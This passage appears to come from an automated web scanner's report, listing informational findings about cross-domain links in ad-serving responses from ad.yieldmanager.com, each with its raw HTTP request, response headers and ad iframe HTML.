<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601692_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlTctugzAQ.BpuyPILSIR6MHEj0cZVkVARXCJim5IGcGqIkubr65aKH-hqtTszmp1FJJa1wrAJA6lpQOqDjBHBMsKaNnXkwziOUQAjQtaIQn9ME8U4ginbFDLM2G.xNX-ekZt8xbJ0Zq8rBq4cAGqsuM7Sp1j
...[SNIP]...
J1Enn5VfZVK5ZD9uD77TSdPcI8vHWtwGRrpW.AnPVwA9L0TqwbC86tM22tbqweW49wCj0c3s2gj8qxMEA.XB4cPg6jttPe1oMy.X649Adt96222hk6I53jGwZ-dF0=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601692_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601692_HERE" border="0" alt=""></a>
...[SNIP]...
19.41. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADK4.mhv-PRCiNzL1PMPN.I2QB8DzjJIdS8OfqsAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D4099368764%26r%3D0%26s%3D2126909,2afc42f8-ed55-11e0-bf82-78e7d16291f8,1317601087029 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:18:08 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0365.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:18:08 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601087_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlTctugzAQ.BpuyLLBECPUg4mFRBsnjeQ2Si4R2E5IE2PqUOXx9XVLlR.oarU7M5qdRXFea4kzKCOs9KRBqMlRHMlJlKBEJSHM85xAQlI4ycJzVSjKEKzodCXTJf0tlrGXEfnJCF1WI3slFFwYANg6fhmlT07
...[SNIP]...
Q6crG-LURpFo9D-hSG7TD0QUyDqPStwOBqpa.A9rq7AmmNF-udA33rTaXTO6fPbRAzDIMovdtOH5RnaYJ-uGw8PnRn7Yatqztlzbb7Mo1221Y77Q0nK73jG3Zfcz8=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601087_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601087_HERE" border="0" alt=""></a>
...[SNIP]...
19.42. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADCwmS7-DRCscXf-PeJ9zlQNFORjk.dqcrIsBeAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D2263233777%26r%3D0%26s%3D2126909,7e0dccca-ed53-11e0-8676-78e7d15f8c04,1317600367401 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:07 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0260.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:06:07 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317600367_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGljE1ugzAQhU.DDlm2MQkW6sLETYQS0yZCqdoNAtsp-QFTQwXK6WuVKhfoaDTzvdGbh4K4oqQKZRlJWp1CGdAYBVguUYkIRT6M4xgjvIwowZj6fZooxhFM2epZLvbstzjl25nc5BHbm1m9RgyMHABirBjn05e
...[SNIP]...
J1FfmxedmIMXs8siffr4eh8wLm4bVrBQZbKj0B0-l2AtI07lieLOhqZ1pbfbK6r72AE-jhxd20-qycWoSQOi0rx-e213YobNkq0xTtd1NpW9Taame4GekcPwXzc1o=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600367_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317600367_HERE" border="0" alt=""></a>
...[SNIP]...
19.43. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADOZ.y.bePRCpUVSLbJpvV4T3MLte6rRO.QngoDAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D1612129670%26r%3D0%26s%3D2126909,fa25f4da-ed54-11e0-8b25-78e7d15f8c7a,1317601005094 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:16:48 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0051.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:16:48 GMT
Pragma: no-cache
Content-Length: 1598
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601005_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlUMFugzAM.RpuKEpICkxoh1AEYmu6MSGq9oIgSUdpISwwFfXrF5WqPzDLst-znm3ZCAeC1550Xa9yoFhVvgwQdrjnYFF7rg2DIMAO8j2yQhDbYxoKGiGY0vWOuxm9W.QSvS.IxMinWbqwT5-CawQAUZpdl9I
...[SNIP]...
xZXnQfCcP7x0mm.9W2m2kaLEwtJzYuwKQrIWegBtnPgKvOFKujBkNjRLGWRy3HxsIRgZbj3lQvT8Iw1.zNcF4bfOpHqadSV71QXdn.drXUZSO1NIKL4kbxBy9yc2k=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601005_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601005_HERE" border="0" alt=""></a>
...[SNIP]...
19.44. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABg9ORn3-XRCjCT4Fi4kVwr9-PHAwGQFXjoLR36AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D1889338235%26r%3D0%26s%3D2126909,6f408496-ed56-11e0-b342-9f80e0a6d1ca,1317601631058 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:27:13 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0143.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:27:13 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601631_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGlT11rhDAQ.DW-SYjxo4r0IV7OIr3YCl7L3YuoidWeGhtTzvrrG-pxf6DLsjszzA6sZYfI4lUJ3YqVzGcV46Flo.oBMc9pmAnDMAwgDHzkesick4hhYsEE7.a1l-G.IgF53pCexMeZ2Nirj8GVAOAISa-b9EV
...[SNIP]...
Tq6dMenUn8ebq9pO8fTbNVajJsbKBYNwNKlowvQEx8XEAtBi2WjQRTq02x5I3kc2vYxIEG8lYx8o5p5rkw0LyuNO7GmUtVyHJkYijG76Hismi55NrQi1o7fgEopnRB,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601631_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601631_HERE" border="0" alt=""></a>
...[SNIP]...
19.45. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtoxP4-t.RCkV6jwcN.7yP4qD5GBhbG.f1IMYNAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D861259719%26r%3D0%26s%3D2126909,ec1a04aa-ed52-11e0-ab2b-78e7d15f9cb4,1317600122534 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:56 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0352.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:02:56 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 1
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317600122_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGljNFqgzAUhp.GOwlq1Ciyi9jU4lbdCqJ0N2JjXGzVuOiw9OkX6vAFdjic8.2H..wmDChDtKE-bRCEyPLdwIQWRSaykMd0IwgCZPu24yLk6FMc1piYRox3e-qe8LOIT95WUpN4-CRW9eFhsBAAbCGTZT19J56
...[SNIP]...
tvSZb370XaptsjftF1Ps-jBrFmRaprMMuqZncgRjbcARW9OlaNBCNXpkiyRrKJa5DYhma5DzGwtlbKdQxfaXpR3A4Tk3Mpq6EWfTn89BcmS84kU4ZOUOX4BQZKc7o=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600122_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317600122_HERE" border="0" alt=""></a>
...[SNIP]...
19.46. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADhQ1A5.ePRCt97OCwfRDMjAjov0R8mzc2lZjbTAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D3586971899%26r%3D0%26s%3D2126909,506aefa8-ed55-11e0-88d7-78e7d15f8a9e,1317601149830 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:19:15 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0311.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:19:15 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601149_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGlT12LgzAQ.DW-SUjiRxW5B220yNX2BNsDX8QmsZYa40UPpb.-wln6B7osuzPD7MAiK6AU25SyxuccsdrBAbIw3WAXeQ4yYRAE2PM93984jmWOacRCgmAabmPq5uF.EZ98rkhP4oW5XNmXF4KZAGBLlc2r9JN
...[SNIP]...
t2z4qzOO5ip3y-pO8.TLOdpsGwQgMnuhmYVM34AuTA-wVQKbRYNwoMrTYlijeKj61hERsa2H3Int-YZq4Dfc3pReNbP3I1VarumRRV.ysuXFUtV1wbOkm14w9v73OS,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601149_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601149_HERE" border="0" alt=""></a>
...[SNIP]...
19.47. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACHuKP7v-bRCqvP37Gi53-Mxd6FXaWoIVacMaCvAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3595683931%26r%3D0%26s%3D2126909,f4b3c9c6-ed56-11e0-accc-78e7d1614f42,1317601854950 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:09 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0168.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:31:09 GMT
Pragma: no-cache
Content-Length: 1598
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317601854_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlkN9qgzAUxp.GOwlJjH-K7CJWHLLGreBW3I3YJM7aalx0KH36ZbX0BRYOyfcdfucLHOSE0keE1NythBQIb9wQOZj7Dqy5CGwYhiGBnuthz.WhPaaRoDGCKd0euLentxNv4pdVmTsO6D5d3VtAwRwDQJRm89r
...[SNIP]...
dnlhdLZlh2zzHzT7bdTNNgOdTCiSkBJm1WtAA1yH4BXHWmWdUaDI2BEi1rLcfGcmICLexdVS9PwjjPRX-eH40-9aPUU6mrXqiu7H-6o9RlI7U0wEVxQ.wCPeRzig==,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317601854_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317601854_HERE" border="0" alt=""></a>
...[SNIP]...
19.48. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANIM65y-XRCkEdS4R3Ohpg89IDW2GceX8AKe3iAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D265139599%26r%3D0%26s%3D2126909,63bcc706-ed56-11e0-a06b-78e7d15f9a12,1317601611740 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
